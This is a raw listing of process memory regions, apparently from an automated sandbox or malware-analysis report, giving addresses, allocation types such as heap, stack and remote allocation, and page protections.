trusted library allocation
page read and write
93D0000
trusted library allocation
page read and write
9140000
trusted library allocation
page read and write
91D0000
trusted library allocation
page read and write
2C20000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
55C2000
heap
page read and write
1A55C23C000
heap
page read and write
1C1521E0000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
586C000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
6E6E000
trusted library allocation
page read and write
9150000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
59D6000
trusted library allocation
page read and write
505017E000
stack
page read and write
8F30000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
8F30000
trusted library allocation
page read and write
8D2F000
stack
page read and write
4D3B000
heap
page read and write
94E0000
unkown
page read and write
C87AAFC000
stack
page read and write
21DD667B000
heap
page read and write
91C0000
trusted library allocation
page read and write
6DCB000
trusted library allocation
page read and write
75D9000
unkown
page read and write
6E67000
trusted library allocation
page read and write
9230000
trusted library allocation
page read and write
82A0000
trusted library allocation
page read and write
9B0D879000
stack
page read and write
4E20000
trusted library allocation
page read and write
9540000
trusted library allocation
page read and write
9F50000
trusted library allocation
page read and write
9530000
trusted library allocation
page read and write
9F40000
trusted library allocation
page read and write
8240000
trusted library allocation
page read and write
6D20000
heap
page read and write
9F40000
trusted library allocation
page read and write
5850000
trusted library allocation
page read and write
9070000
trusted library allocation
page read and write
6FE0000
trusted library allocation
page read and write
9050000
trusted library allocation
page read and write
2C50000
trusted library allocation
page read and write
29D5D3E0000
trusted library allocation
page read and write
9140000
trusted library allocation
page read and write
7EF000
stack
page read and write
90D0000
trusted library allocation
page read and write
6DE4000
trusted library allocation
page read and write
53C0000
heap
page read and write
9520000
trusted library allocation
page read and write
8260000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
8F40000
trusted library allocation
page read and write
83EBDFD000
stack
page read and write
9470000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
75B0000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
29D5D43C000
heap
page read and write
1C156830000
trusted library allocation
page read and write
1C156A49000
heap
page read and write
8EF0000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
9130000
trusted library allocation
page read and write
9240000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
4D46000
heap
page read and write
505007F000
stack
page read and write
558A000
heap
page read and write
8EB0000
trusted library allocation
page read and write
6E8E000
trusted library allocation
page read and write
90D0000
trusted library allocation
page read and write
4B3D000
stack
page read and write
82A0000
trusted library allocation
page read and write
9FD0000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
75A0000
trusted library allocation
page read and write
4C3B000
stack
page read and write
94A0000
trusted library allocation
page read and write
2D611C02000
trusted library allocation
page read and write
5E90000
heap
page read and write
7550000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
75E0000
trusted library allocation
page read and write
9F60000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
1A55C030000
heap
page read and write
9090000
trusted library allocation
page read and write
7590000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
4D41000
heap
page read and write
4C50000
direct allocation
page read and write
8EC0000
trusted library allocation
page read and write
616F000
trusted library allocation
page read and write
7070000
trusted library allocation
page read and write
1F8A624C000
heap
page read and write
1F8A6252000
heap
page read and write
514C000
trusted library allocation
page read and write
9230000
trusted library allocation
page read and write
4B34000
heap
page read and write
543E000
stack
page read and write
A7E000
heap
page read and write
9170000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
1A55CD90000
remote allocation
page read and write
2CE0000
remote allocation
page execute and read and write
90C0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
74F0000
direct allocation
page read and write
6072000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
784E000
stack
page read and write
1A55CE02000
heap
page read and write
8205000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
21CB2C13000
heap
page read and write
91A0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
9230000
trusted library allocation
page read and write
AEE000
heap
page read and write
A02000
heap
page read and write
1F8A6300000
heap
page read and write
7000000
trusted library allocation
page read and write
6DC6000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
8240000
trusted library allocation
page read and write
4DAD000
stack
page read and write
AED0000
trusted library allocation
page read and write
63EC000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
83EC2FE000
stack
page read and write
9FA0000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
28267627000
heap
page read and write
29D5D500000
heap
page read and write
F15987E000
stack
page read and write
1C1522C0000
trusted library section
page readonly
5F41000
trusted library allocation
page read and write
4C8B000
trusted library allocation
page execute and read and write
7030000
trusted library allocation
page read and write
6FEC000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
4E10000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
5DB8000
trusted library allocation
page read and write
90D0000
trusted library allocation
page read and write
2C40000
trusted library allocation
page read and write
553E000
heap
page read and write
92A0000
trusted library allocation
page read and write
1C156960000
trusted library allocation
page read and write
83EBBFE000
stack
page read and write
9210000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
9530000
trusted library allocation
page read and write
5470000
heap
page read and write
8F30000
unkown
page read and write
7FD0000
trusted library allocation
page read and write
BBA76FB000
stack
page read and write
9120000
trusted library allocation
page read and write
9160000
trusted library allocation
page read and write
94B0000
trusted library allocation
page read and write
504F53B000
stack
page read and write
6E10000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
49BE000
stack
page read and write
514F000
stack
page read and write
5867000
trusted library allocation
page read and write
4D08000
heap
page read and write
9120000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
81F0000
unkown
page read and write
FC0000
heap
page read and write
4F30000
trusted library allocation
page read and write
5E86000
trusted library allocation
page read and write
9FE0000
trusted library allocation
page read and write
922E000
trusted library allocation
page read and write
5544000
heap
page read and write
1C1B0E41000
heap
page read and write
4D70000
unkown
page read and write
1C151B00000
heap
page read and write
84D000
stack
page read and write
21CB2D13000
heap
page read and write
92A0000
trusted library allocation
page read and write
94C0000
trusted library allocation
page read and write
7590000
trusted library allocation
page read and write
81F0000
unkown
page read and write
67F3000
trusted library allocation
page read and write
55C5000
trusted library allocation
page read and write
90D0000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
59DE000
trusted library allocation
page read and write
49E7000
heap
page read and write
8207000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
28267667000
heap
page read and write
7FE0000
trusted library allocation
page read and write
9360000
trusted library allocation
page read and write
1A55C996000
heap
page read and write
5113000
trusted library allocation
page read and write
9090000
trusted library allocation
page read and write
2C30000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
59D6000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
2DA0000
unkown
page read and write
9FA0000
trusted library allocation
page read and write
9FC0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
5643000
trusted library allocation
page read and write
6DDE000
trusted library allocation
page read and write
1C156A23000
heap
page read and write
7FD5000
trusted library allocation
page read and write
1A55C2C0000
heap
page read and write
7BD000
stack
page read and write
4884000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
8250000
trusted library allocation
page read and write
4C87000
trusted library allocation
page execute and read and write
75D0000
unkown
page read and write
2CD0000
remote allocation
page read and write
4D53000
heap
page read and write
4C53000
trusted library allocation
page execute and read and write
54CC000
trusted library allocation
page read and write
9090000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
81F0000
unkown
page read and write
91B0000
trusted library allocation
page read and write
2E37000
heap
page read and write
1C151A15000
heap
page read and write
5831000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
8E90000
trusted library allocation
page read and write
1C151170000
heap
page read and write
2CD0000
remote allocation
page read and write
9FA0000
trusted library allocation
page read and write
1A55C9BE000
heap
page read and write
581E000
stack
page read and write
8280000
trusted library allocation
page read and write
9580000
trusted library allocation
page read and write
7590000
trusted library allocation
page read and write
2C20000
trusted library allocation
page read and write
6E1D000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
1A55C2D3000
heap
page read and write
8240000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
5FC0000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
9590000
trusted library allocation
page read and write
8070000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
8A10000
direct allocation
page read and write
1C27D229000
heap
page read and write
81F0000
unkown
page read and write
6E31000
trusted library allocation
page read and write
2C30000
trusted library allocation
page read and write
81F5000
unkown
page read and write
75B0000
trusted library allocation
page read and write
1C151302000
heap
page read and write
A5B000
heap
page read and write
9FE0000
trusted library allocation
page read and write
50645F8000
stack
page read and write
81F0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
4C85000
trusted library allocation
page execute and read and write
9510000
trusted library allocation
page read and write
70A0000
trusted library allocation
page read and write
9250000
unkown
page read and write
75D0000
unkown
page read and write
6E51000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
1A55C2FF000
heap
page read and write
9FA0000
trusted library allocation
page read and write
45F0000
remote allocation
page read and write
8260000
trusted library allocation
page read and write
4E70000
trusted library allocation
page read and write
90E0000
trusted library allocation
page read and write
511E000
stack
page read and write
8205000
trusted library allocation
page read and write
9F40000
trusted library allocation
page read and write
2C60000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
5518000
heap
page read and write
81F0000
trusted library allocation
page read and write
4D98000
heap
page read and write
9476000
trusted library allocation
page read and write
CDD25FE000
stack
page read and write
8F40000
trusted library allocation
page read and write
9F50000
trusted library allocation
page read and write
9140000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
7FE7000
trusted library allocation
page read and write
81F0000
trusted library allocation
page read and write
6DDB000
trusted library allocation
page read and write
9050000
trusted library allocation
page read and write
9430000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
9270000
trusted library allocation
page read and write
9EF000
stack
page read and write
9140000
trusted library allocation
page read and write
6E1A000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
70C0000
trusted library allocation
page read and write
5A0000
heap
page read and write
6B7F000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
1C1522F0000
trusted library section
page readonly
8200000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
5A3E000
trusted library allocation
page read and write
1A55CE20000
heap
page read and write
6569000
trusted library allocation
page read and write
5113000
trusted library allocation
page read and write
90C7000
trusted library allocation
page read and write
66C0000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
1A55C997000
heap
page read and write
21DD6692000
heap
page read and write
2CD0000
remote allocation
page read and write
90A0000
trusted library allocation
page read and write
4E20000
trusted library allocation
page read and write
4858000
trusted library allocation
page read and write
5598000
heap
page read and write
1A55C930000
heap
page read and write
7110000
trusted library allocation
page read and write
2C2E000
trusted library allocation
page read and write
9075000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
75D8000
unkown
page read and write
1C1B0E13000
heap
page read and write
45BE000
stack
page read and write
BBA71FC000
stack
page read and write
1F8A623C000
heap
page read and write
1C156940000
trusted library allocation
page read and write
4D47000
heap
page read and write
9FB0000
trusted library allocation
page read and write
563B000
trusted library allocation
page read and write
7050000
trusted library allocation
page read and write
82A0000
unkown
page read and write
8F20000
trusted library allocation
page read and write
3708000
heap
page read and write
9540000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
5E1F000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
4970000
heap
page read and write
92B0000
trusted library allocation
page read and write
9B0D8FE000
stack
page read and write
1C151297000
heap
page read and write
5DC1000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
2C60000
trusted library allocation
page read and write
1C152680000
trusted library allocation
page read and write
92B0000
trusted library allocation
page read and write
1C157000000
heap
page read and write
5586000
heap
page read and write
75B0000
trusted library allocation
page read and write
6071000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
90A0000
trusted library allocation
page read and write
81F0000
unkown
page read and write
4FA0000
heap
page execute and read and write
5DC1000
trusted library allocation
page read and write
92E0000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
5573000
heap
page read and write
8D6C000
stack
page read and write
75D0000
trusted library allocation
page read and write
7FE7000
unkown
page read and write
9FA0000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
90AB000
trusted library allocation
page read and write
6E9A000
trusted library allocation
page read and write
BBA79FE000
stack
page read and write
47CE000
stack
page read and write
ABD5877000
stack
page read and write
75F0000
trusted library allocation
page read and write
29D5D350000
heap
page read and write
75D0000
trusted library allocation
page read and write
9530000
trusted library allocation
page read and write
4C7C000
stack
page read and write
90D0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
9497000
unkown
page read and write
8250000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
1A55C976000
heap
page read and write
6DC5000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
7DFAAFB000
stack
page read and write
9090000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
800000
heap
page read and write
9120000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
9160000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
36B0000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
8F77000
trusted library allocation
page read and write
4DA3000
heap
page read and write
6E0B000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
96E000
stack
page read and write
1A55C999000
heap
page read and write
2CD0000
remote allocation
page read and write
8EE0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
8EA0000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
55AB000
heap
page read and write
C87A37C000
stack
page read and write
83EBFFE000
stack
page read and write
67C0000
trusted library allocation
page read and write
9125000
trusted library allocation
page read and write
9F53000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
8EC0000
trusted library allocation
page read and write
9F60000
trusted library allocation
page read and write
9125000
trusted library allocation
page read and write
7590000
trusted library allocation
page read and write
4E70000
trusted library allocation
page read and write
8F40000
trusted library allocation
page read and write
9FD0000
trusted library allocation
page read and write
9153000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
9070000
trusted library allocation
page read and write
6071000
trusted library allocation
page read and write
5A18000
trusted library allocation
page read and write
6841000
trusted library allocation
page read and write
CDD217C000
stack
page read and write
9170000
trusted library allocation
page read and write
91C0000
trusted library allocation
page read and write
75BC000
trusted library allocation
page read and write
9114000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
8DAC000
stack
page read and write
4D42000
heap
page read and write
2CD0000
remote allocation
page read and write
9090000
trusted library allocation
page read and write
6E73000
trusted library allocation
page read and write
29D5D451000
heap
page read and write
21DD6965000
heap
page read and write
28267F00000
heap
page read and write
9090000
trusted library allocation
page read and write
82A0000
trusted library allocation
page read and write
90C0000
trusted library allocation
page read and write
9F60000
trusted library allocation
page read and write
9F50000
trusted library allocation
page read and write
AC8000
heap
page read and write
6C01000
trusted library allocation
page read and write
4B59000
heap
page read and write
2CD0000
remote allocation
page read and write
55C2000
heap
page read and write
21CB3402000
trusted library allocation
page read and write
9540000
trusted library allocation
page read and write
8F10000
trusted library allocation
page read and write
5A9C000
trusted library allocation
page read and write
160000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
9120000
trusted library allocation
page read and write
4F2C000
stack
page read and write
1A55C995000
heap
page read and write
6FE0000
trusted library allocation
page read and write
8EC0000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
90B0000
trusted library allocation
page read and write
5941000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
6980000
trusted library allocation
page read and write
8060000
trusted library allocation
page read and write
9220000
trusted library allocation
page read and write
37A000
stack
page read and write
9470000
trusted library allocation
page read and write
F1598FF000
stack
page read and write
1C27DA02000
trusted library allocation
page read and write
61EE000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
4B59000
heap
page read and write
8210000
unkown
page read and write
9F40000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
81F0000
unkown
page read and write
5C75000
trusted library allocation
page read and write
4AFA000
heap
page read and write
8200000
trusted library allocation
page read and write
5548000
heap
page read and write
9087000
trusted library allocation
page read and write
55D1000
trusted library allocation
page read and write
F15957E000
stack
page read and write
2CD0000
remote allocation
page read and write
81F0000
trusted library allocation
page read and write
9F50000
trusted library allocation
page read and write
7FE5000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
9FD0000
trusted library allocation
page read and write
75D0000
unkown
page read and write
6E91000
trusted library allocation
page read and write
1C151213000
heap
page read and write
9F50000
trusted library allocation
page read and write
9480000
unkown
page read and write
3380000
unkown
page readonly
9530000
trusted library allocation
page read and write
9115000
trusted library allocation
page read and write
470B000
stack
page read and write
921A000
trusted library allocation
page read and write
9210000
trusted library allocation
page read and write
9210000
trusted library allocation
page read and write
5A33000
trusted library allocation
page read and write
9140000
unkown
page read and write
2D61143C000
heap
page read and write
7FE0000
trusted library allocation
page read and write
1A55BFC0000
heap
page read and write
75D8000
unkown
page read and write
8280000
trusted library allocation
page read and write
2D40000
trusted library section
page read and write
9120000
trusted library allocation
page read and write
9190000
trusted library allocation
page read and write
2C50000
trusted library allocation
page read and write
9323000
trusted library allocation
page read and write
74F2000
direct allocation
page read and write
9090000
trusted library allocation
page read and write
1C27D308000
heap
page read and write
1A55C976000
heap
page read and write
75F0000
trusted library allocation
page read and write
1A55C972000
heap
page read and write
9FE0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
95D0000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
28267F3A000
heap
page read and write
C87A8FD000
stack
page read and write
FB8000
heap
page read and write
9F40000
trusted library allocation
page read and write
9540000
trusted library allocation
page read and write
1C27D283000
heap
page read and write
6E64000
trusted library allocation
page read and write
21DD66B2000
heap
page read and write
2C20000
trusted library allocation
page read and write
4C63000
trusted library allocation
page read and write
5840000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
6D39000
trusted library allocation
page read and write
4D3E000
heap
page read and write
1C156AFD000
heap
page read and write
1A55C979000
heap
page read and write
4C50000
trusted library allocation
page read and write
9F60000
trusted library allocation
page read and write
1C152661000
trusted library allocation
page read and write
5586000
heap
page read and write
9070000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
90D0000
trusted library allocation
page read and write
75D5000
unkown
page read and write
7FE0000
trusted library allocation
page read and write
9F90000
trusted library allocation
page read and write
4B6A000
heap
page read and write
1A55C2B4000
heap
page read and write
92C0000
trusted library allocation
page read and write
81F0000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
2C60000
trusted library allocation
page read and write
90D0000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
CDD1D7B000
stack
page read and write
9080000
trusted library allocation
page read and write
4FE4000
heap
page read and write
6DFE000
trusted library allocation
page read and write
4828000
trusted library allocation
page read and write
4FC0000
heap
page execute and read and write
5A40000
trusted library allocation
page read and write
5CB9000
trusted library allocation
page read and write
6DBF000
trusted library allocation
page read and write
4C57000
direct allocation
page read and write
5B41000
trusted library allocation
page read and write
9220000
trusted library allocation
page read and write
4B61000
heap
page read and write
6DE7000
trusted library allocation
page read and write
21DD6692000
heap
page read and write
6DF4000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
8F30000
trusted library allocation
page read and write
5995000
trusted library allocation
page read and write
90B0000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
4B82000
direct allocation
page read and write
2CD0000
remote allocation
page read and write
9540000
trusted library allocation
page read and write
9090000
trusted library allocation
page read and write
5BEC000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
8218000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
9050000
trusted library allocation
page read and write
6C70000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
9230000
trusted library allocation
page read and write
9090000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
6E60000
trusted library allocation
page read and write
4B86000
direct allocation
page read and write
1C156A54000
heap
page read and write
2CD0000
remote allocation
page read and write
6E37000
trusted library allocation
page read and write
2C20000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
8F37000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
9530000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
7020000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
5C2E000
trusted library allocation
page read and write
5940000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
8240000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
6BF0000
direct allocation
page read and write
9F40000
trusted library allocation
page read and write
59D5000
trusted library allocation
page read and write
1C156720000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
21DD66B0000
heap
page read and write
4F20000
trusted library allocation
page read and write
AEB000
heap
page read and write
55AE000
heap
page read and write
81F0000
unkown
page read and write
9F59000
trusted library allocation
page read and write
55AB000
heap
page read and write
90E0000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
75D5000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
4E10000
trusted library allocation
page read and write
8F70000
trusted library allocation
page read and write
1C156860000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
F15914C000
stack
page read and write
BF4000
trusted library allocation
page read and write
28267669000
heap
page read and write
21CB2C61000
heap
page read and write
9180000
trusted library allocation
page read and write
5064377000
stack
page read and write
7FD5000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
6E61000
trusted library allocation
page read and write
2C40000
trusted library allocation
page read and write
5849000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
6B76000
direct allocation
page read and write
21CB2BE0000
trusted library allocation
page read and write
5DBE000
trusted library allocation
page read and write
1C156990000
remote allocation
page read and write
47CE000
unkown
page read and write
69FF000
trusted library allocation
page read and write
2C10000
trusted library allocation
page read and write
D07000
heap
page read and write
9540000
trusted library allocation
page read and write
4DA3000
heap
page read and write
4B6E000
heap
page read and write
6E0D000
trusted library allocation
page read and write
4F50000
remote allocation
page read and write
90A8000
trusted library allocation
page read and write
5EC0000
trusted library allocation
page read and write
75D8000
trusted library allocation
page read and write
91C0000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
1A55C802000
heap
page read and write
1C156854000
trusted library allocation
page read and write
2C1E000
trusted library allocation
page read and write
1C151A02000
heap
page read and write
9F50000
trusted library allocation
page read and write
61EF000
trusted library allocation
page read and write
9540000
trusted library allocation
page read and write
8200000
unkown
page read and write
90E0000
trusted library allocation
page read and write
5A87000
trusted library allocation
page read and write
9227000
trusted library allocation
page read and write
21DD66B4000
heap
page read and write
75D0000
trusted library allocation
page read and write
9F40000
trusted library allocation
page read and write
21CB2C3C000
heap
page read and write
5AC0000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
9210000
trusted library allocation
page read and write
6B81000
direct allocation
page read and write
4CEE000
stack
page read and write
9080000
trusted library allocation
page read and write
561D000
trusted library allocation
page read and write
AA3000
heap
page read and write
1F8A628B000
heap
page read and write
1C156690000
trusted library allocation
page read and write
72E0000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
2C40000
trusted library allocation
page read and write
89F0000
direct allocation
page read and write
90D5000
trusted library allocation
page read and write
9F60000
trusted library allocation
page read and write
9229000
trusted library allocation
page read and write
9F50000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
6527000
trusted library allocation
page read and write
FF0000
heap
page read and write
4E70000
trusted library allocation
page read and write
91A0000
unkown
page read and write
6E74000
trusted library allocation
page read and write
5A2B000
trusted library allocation
page read and write
5A63000
trusted library allocation
page read and write
6DD1000
trusted library allocation
page read and write
8210000
trusted library allocation
page read and write
BFF000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
9380000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
7FE0000
unkown
page read and write
4AFC000
heap
page read and write
90B0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
487A000
trusted library allocation
page read and write
81F0000
unkown
page read and write
83EB9FB000
stack
page read and write
1C156B02000
heap
page read and write
2D61142A000
heap
page read and write
75E0000
trusted library allocation
page read and write
9140000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
9140000
trusted library allocation
page read and write
9FC0000
trusted library allocation
page read and write
9230000
trusted library allocation
page read and write
9F45000
trusted library allocation
page read and write
9FE0000
trusted library allocation
page read and write
6FD0000
trusted library allocation
page read and write
CDD24FE000
stack
page read and write
83EBAFD000
stack
page read and write
9F40000
trusted library allocation
page read and write
9125000
trusted library allocation
page read and write
5586000
heap
page read and write
90E1000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
4D10000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
6E24000
trusted library allocation
page read and write
1C27D254000
heap
page read and write
5950000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
9540000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
29D5D400000
heap
page read and write
4870000
trusted library allocation
page read and write
583D000
trusted library allocation
page read and write
4F0E000
unkown
page read and write
9220000
trusted library allocation
page read and write
82A9000
trusted library allocation
page read and write
9095000
unkown
page read and write
8200000
trusted library allocation
page read and write
1A55C97F000
heap
page read and write
1C15683E000
trusted library allocation
page read and write
8F50000
trusted library allocation
page read and write
9F40000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
9020000
trusted library allocation
page read and write
2C30000
trusted library allocation
page read and write
8FD0000
trusted library allocation
page read and write
1A55CE02000
heap
page read and write
9080000
trusted library allocation
page read and write
8B1E000
stack
page read and write
5F40000
trusted library allocation
page read and write
9160000
trusted library allocation
page read and write
5D39000
trusted library allocation
page read and write
2F15000
heap
page read and write
9080000
trusted library allocation
page read and write
81E0000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
8FC0000
trusted library allocation
page read and write
1C156B02000
heap
page read and write
58D0000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
1C156710000
trusted library allocation
page read and write
6A7F000
trusted library allocation
page read and write
BEE000
stack
page read and write
7540000
trusted library allocation
page read and write
1C151A00000
heap
page read and write
4D44000
heap
page read and write
584D000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
7590000
trusted library allocation
page read and write
9140000
trusted library allocation
page read and write
2EDE000
heap
page read and write
2C20000
trusted library allocation
page read and write
556C000
heap
page read and write
1C151160000
heap
page read and write
D0B000
heap
page read and write
94A4000
trusted library allocation
page read and write
9140000
trusted library allocation
page read and write
90B0000
trusted library allocation
page read and write
6DD7000
trusted library allocation
page read and write
9D0000
trusted library allocation
page read and write
55AE000
heap
page read and write
75D0000
unkown
page read and write
7210000
trusted library allocation
page read and write
5121000
trusted library allocation
page read and write
70B0000
trusted library allocation
page read and write
F58000
heap
page read and write
9157000
trusted library allocation
page read and write
9125000
trusted library allocation
page read and write
9540000
trusted library allocation
page read and write
2C10000
trusted library allocation
page read and write
7FD0000
trusted library allocation
page read and write
21CB2C29000
heap
page read and write
9080000
trusted library allocation
page read and write
21CB2C7E000
heap
page read and write
59D2000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
9524000
trusted library allocation
page read and write
8235000
trusted library allocation
page read and write
4BCA000
unkown
page read and write
6C30000
direct allocation
page read and write
8BFD000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
488E000
trusted library allocation
page read and write
65C0000
trusted library allocation
page read and write
29D5D428000
heap
page read and write
9190000
trusted library allocation
page read and write
1A55CE03000
heap
page read and write
606A000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
5573000
heap
page read and write
1A55C2AA000
heap
page read and write
1C156AF0000
heap
page read and write
2CD0000
remote allocation
page read and write
1F8A6271000
heap
page read and write
9120000
trusted library allocation
page read and write
6E4A000
trusted library allocation
page read and write
81F0000
trusted library allocation
page read and write
586C000
trusted library allocation
page read and write
CDD227B000
stack
page read and write
9090000
trusted library allocation
page read and write
9440000
trusted library allocation
page read and write
6E53000
trusted library allocation
page read and write
7DFA75F000
stack
page read and write
54BE000
stack
page read and write
6E96000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
9540000
trusted library allocation
page read and write
4D5F000
unkown
page read and write
9150000
trusted library allocation
page read and write
92B0000
trusted library allocation
page read and write
5AC0000
trusted library allocation
page read and write
8250000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
4B4B000
heap
page read and write
92A0000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
740000
heap
